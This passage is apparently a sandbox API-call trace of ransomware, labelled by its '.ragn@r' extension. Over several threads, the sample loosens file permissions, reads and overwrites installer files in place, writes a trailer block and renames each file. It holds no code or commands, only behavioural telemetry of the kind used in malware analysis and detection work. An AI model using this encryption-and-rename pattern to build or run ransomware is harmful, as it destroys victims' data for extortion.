hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x1198c, lpNumberOfBytesRead=0x5affcc4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affcc4*=0x1198c, lpOverlapped=0x0) returned 1 [0173.400] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affcc8 | out: lpNewFilePointer=0x0) returned 1 [0173.401] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1198c, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.401] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x1198c, lpNumberOfBytesWritten=0x5affcc0, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affcc0*=0x1198c, lpOverlapped=0x0) returned 1 [0173.401] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1198c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.401] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.403] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x1198c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.403] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.403] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affd00, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5affd00*=0x100, lpOverlapped=0x0) returned 1 [0173.403] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affd00, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5affd00*=0x100, lpOverlapped=0x0) returned 1 [0173.404] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affd04*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affd00, lpOverlapped=0x0 | out: lpBuffer=0x5affd04*, lpNumberOfBytesWritten=0x5affd00*=0xf, lpOverlapped=0x0) returned 1 [0173.404] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.404] GetProcessHeap () returned 0x3520000 [0173.404] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0173.404] CloseHandle (hObject=0x3b8) returned 1 [0173.408] lstrcpyW (in: lpString1=0x5aff870, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0173.408] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.ragn@r_B8CF767A" [0173.408] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 206 os_tid = 0xd98 [0173.720] GetNamedSecurityInfoW () returned 0x0 [0173.740] SetEntriesInAclW () returned 0x0 [0173.740] SetNamedSecurityInfoW () returned 0x0 [0173.741] LocalFree (hMem=0x358d660) returned 0x0 [0173.741] LocalFree (hMem=0x358d674) returned 0x358d674 [0173.741] LocalFree (hMem=0x5d4ff20) returned 0x0 [0173.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 0x20 [0173.741] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0173.741] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affea8 | out: lpFileSize=0x5affea8*=4254) returned 1 [0173.741] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x108f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.742] GetProcessHeap () returned 0x3520000 [0173.742] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0173.742] ReadFile (in: hFile=0x3b8, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affe60, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affe60*=0xf, lpOverlapped=0x0) returned 1 [0173.744] VirtualAlloc (lpAddress=0x0, dwSize=0x109e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0173.745] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.745] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affe7c | out: lpNewFilePointer=0x0) returned 1 [0173.745] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x109e, lpNumberOfBytesRead=0x5affe50, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affe50*=0x109e, lpOverlapped=0x0) returned 1 [0173.750] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affe54 | out: lpNewFilePointer=0x0) returned 1 [0173.750] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x109e, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.750] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x109e, lpNumberOfBytesWritten=0x5affe4c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affe4c*=0x109e, lpOverlapped=0x0) returned 1 [0173.750] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x109e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.750] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.751] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x109e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.751] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.751] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affe8c, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affe8c*=0x100, lpOverlapped=0x0) returned 1 [0173.751] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affe8c, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affe8c*=0x100, lpOverlapped=0x0) returned 1 [0173.751] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affe90*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affe8c, lpOverlapped=0x0 | out: lpBuffer=0x5affe90*, lpNumberOfBytesWritten=0x5affe8c*=0xf, lpOverlapped=0x0) returned 1 [0173.751] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.751] GetProcessHeap () returned 0x3520000 [0173.751] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0173.751] CloseHandle (hObject=0x3b8) returned 1 [0173.868] lstrcpyW (in: lpString1=0x5aff9fc, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" [0173.868] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.ragn@r_B8CF767A" [0173.868] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 207 os_tid = 0xfc0 [0173.764] GetNamedSecurityInfoW () returned 0x0 [0173.765] SetEntriesInAclW () returned 0x0 [0173.765] SetNamedSecurityInfoW () returned 0x0 [0173.766] LocalFree (hMem=0x358dd30) returned 0x0 [0173.766] LocalFree (hMem=0x358dd44) returned 0x358dd44 [0173.766] LocalFree (hMem=0x5d4ff20) returned 0x0 [0173.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 0x20 [0173.766] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0173.766] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effa48 | out: lpFileSize=0x5effa48*=86442) returned 1 [0173.766] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x1519b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.766] GetProcessHeap () returned 0x3520000 [0173.766] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0173.766] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effa00, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5effa00*=0xf, lpOverlapped=0x0) returned 1 [0173.768] VirtualAlloc (lpAddress=0x0, dwSize=0x151aa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0173.768] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.769] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effa1c | out: lpNewFilePointer=0x0) returned 1 [0173.769] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x151aa, lpNumberOfBytesRead=0x5eff9f0, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff9f0*=0x151aa, lpOverlapped=0x0) returned 1 [0173.771] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff9f4 | out: lpNewFilePointer=0x0) returned 1 [0173.772] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x151aa, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.772] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x151aa, lpNumberOfBytesWritten=0x5eff9ec, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff9ec*=0x151aa, lpOverlapped=0x0) returned 1 [0173.773] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x151aa, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.773] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.774] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x151aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.774] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.774] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effa2c, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effa2c*=0x100, lpOverlapped=0x0) returned 1 [0173.774] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effa2c, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effa2c*=0x100, lpOverlapped=0x0) returned 1 [0173.774] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effa30*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effa2c, lpOverlapped=0x0 | out: lpBuffer=0x5effa30*, lpNumberOfBytesWritten=0x5effa2c*=0xf, lpOverlapped=0x0) returned 1 [0173.774] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.774] GetProcessHeap () returned 0x3520000 [0173.774] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0173.774] CloseHandle (hObject=0x3bc) returned 1 [0173.784] lstrcpyW (in: lpString1=0x5eff59c, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0173.784] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.ragn@r_B8CF767A" [0173.784] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 208 os_tid = 0x24c [0174.040] GetNamedSecurityInfoW () returned 0x0 [0174.040] SetEntriesInAclW () returned 0x0 [0174.040] SetNamedSecurityInfoW () returned 0x0 [0174.041] LocalFree (hMem=0x358e8b8) returned 0x0 [0174.041] LocalFree (hMem=0x358e8cc) returned 0x358e8cc [0174.041] LocalFree (hMem=0x5d4ff20) returned 0x0 [0174.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 0x20 [0174.041] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0174.042] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affe04 | out: lpFileSize=0x5affe04*=3643) returned 1 [0174.042] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xe2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.042] GetProcessHeap () returned 0x3520000 [0174.042] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0174.042] ReadFile (in: hFile=0x3b8, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affdbc, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affdbc*=0xf, lpOverlapped=0x0) returned 1 [0174.044] VirtualAlloc (lpAddress=0x0, dwSize=0xe3b, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0174.045] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.045] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdd8 | out: lpNewFilePointer=0x0) returned 1 [0174.045] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xe3b, lpNumberOfBytesRead=0x5affdac, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affdac*=0xe3b, lpOverlapped=0x0) returned 1 [0174.045] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdb0 | out: lpNewFilePointer=0x0) returned 1 [0174.045] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe3b, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.045] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xe3b, lpNumberOfBytesWritten=0x5affda8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affda8*=0xe3b, lpOverlapped=0x0) returned 1 [0174.046] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe3b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.046] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.046] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xe3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.046] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.046] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affde8, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affde8*=0x100, lpOverlapped=0x0) returned 1 [0174.046] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affde8, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affde8*=0x100, lpOverlapped=0x0) returned 1 [0174.047] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affdec*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affde8, lpOverlapped=0x0 | out: lpBuffer=0x5affdec*, lpNumberOfBytesWritten=0x5affde8*=0xf, lpOverlapped=0x0) returned 1 [0174.047] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.047] GetProcessHeap () returned 0x3520000 [0174.047] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0174.047] CloseHandle (hObject=0x3b8) returned 1 [0174.074] lstrcpyW (in: lpString1=0x5aff958, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" [0174.074] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.ragn@r_B8CF767A" [0174.075] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 209 os_tid = 0xe8c [0174.043] GetNamedSecurityInfoW () returned 0x0 [0174.044] SetEntriesInAclW () returned 0x0 [0174.044] SetNamedSecurityInfoW () returned 0x0 [0174.077] LocalFree (hMem=0x358ef88) returned 0x0 [0174.077] LocalFree (hMem=0x358ef9c) returned 0x358ef9c [0174.077] LocalFree (hMem=0x5d4ff20) returned 0x0 [0174.077] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 0x20 [0174.077] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0174.078] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effc40 | out: lpFileSize=0x5effc40*=80060) returned 1 [0174.078] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x138ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.078] GetProcessHeap () returned 0x3520000 [0174.078] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0174.078] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effbf8, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5effbf8*=0xf, lpOverlapped=0x0) returned 1 [0174.245] VirtualAlloc (lpAddress=0x0, dwSize=0x138bc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0174.245] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.245] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effc14 | out: lpNewFilePointer=0x0) returned 1 [0174.245] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x138bc, lpNumberOfBytesRead=0x5effbe8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effbe8*=0x138bc, lpOverlapped=0x0) returned 1 [0174.262] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effbec | out: lpNewFilePointer=0x0) returned 1 [0174.263] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x138bc, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.263] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x138bc, lpNumberOfBytesWritten=0x5effbe4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effbe4*=0x138bc, lpOverlapped=0x0) returned 1 [0174.263] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x138bc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.263] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.264] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x138bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.264] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.264] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effc24, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effc24*=0x100, lpOverlapped=0x0) returned 1 [0174.265] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effc24, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effc24*=0x100, lpOverlapped=0x0) returned 1 [0174.265] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effc28*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effc24, lpOverlapped=0x0 | out: lpBuffer=0x5effc28*, lpNumberOfBytesWritten=0x5effc24*=0xf, lpOverlapped=0x0) returned 1 [0174.265] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.265] GetProcessHeap () returned 0x3520000 [0174.265] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0174.265] CloseHandle (hObject=0x3bc) returned 1 [0174.300] lstrcpyW (in: lpString1=0x5eff794, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0174.300] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.ragn@r_B8CF767A" [0174.300] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 210 os_tid = 0x1048 [0174.587] GetNamedSecurityInfoW () returned 0x0 [0174.588] SetEntriesInAclW () returned 0x0 [0174.588] SetNamedSecurityInfoW () returned 0x0 [0174.589] LocalFree (hMem=0x358ec50) returned 0x0 [0174.589] LocalFree (hMem=0x358ec64) returned 0x358ec64 [0174.589] LocalFree 